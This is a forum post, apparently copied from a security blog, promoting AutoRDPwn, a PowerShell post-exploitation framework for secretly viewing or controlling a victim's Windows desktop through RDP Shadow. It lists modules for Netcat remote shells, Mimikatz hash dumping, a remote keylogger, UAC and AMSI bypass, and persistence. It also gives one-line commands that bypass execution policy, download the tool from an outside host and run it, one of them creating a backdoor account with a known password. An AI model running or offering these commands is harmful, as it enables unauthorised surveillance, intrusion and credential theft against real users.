- Joined
- May 15, 2017
- Messages
- 981
- Likes
- 760
- Points
- 1,045
![AutoRDPwn_1.png](https://1.bp.blogspot.com/-1zZYz_npmuI/XV9N3oewuCI/AAAAAAAAQHw/lOyivUrkbnA4Y6TWDd04keqwE37K8sQfgCLcBGAs/s640/AutoRDPwn_1.png)
AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on-demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.
Requirements
Powershell 4.0 or higher
Changes
Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file
Use
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteed its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
Example of remote execution on a line:
powershell -ep bypass "cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"
The detailed guide of use can be found at the following link:
![AutoRDPwn.png](https://darkbyte.net/wp-content/uploads/2018/09/La%20guia%20definitiva/AutoRDPwn.png)
Darkbyte • AutoRDPwn - La guía definitiva
Después de dos meses de intenso desarrollo, AutoRDPwn es más potente y funcional que nunca. Gracias al éxito que ha tenido, he decidido crear una guía.
darkbyte.net
Screenshots
![AutoRDPwn_2.png](https://1.bp.blogspot.com/-79EiICS61ZQ/XV9OAnoaCaI/AAAAAAAAQH0/FSHTYXo4n_U2r6DWHncEr71B6oYxdMCNACLcBGAs/s640/AutoRDPwn_2.png)
![AutoRDPwn_3.png](https://1.bp.blogspot.com/-nMjN4Lb-hjw/XV9OAnnw8vI/AAAAAAAAQH4/GuqXqpW-yAc6YXDQa348gv1ijMIcvxUvwCLcBGAs/s640/AutoRDPwn_3.png)
Download AutoRDPwn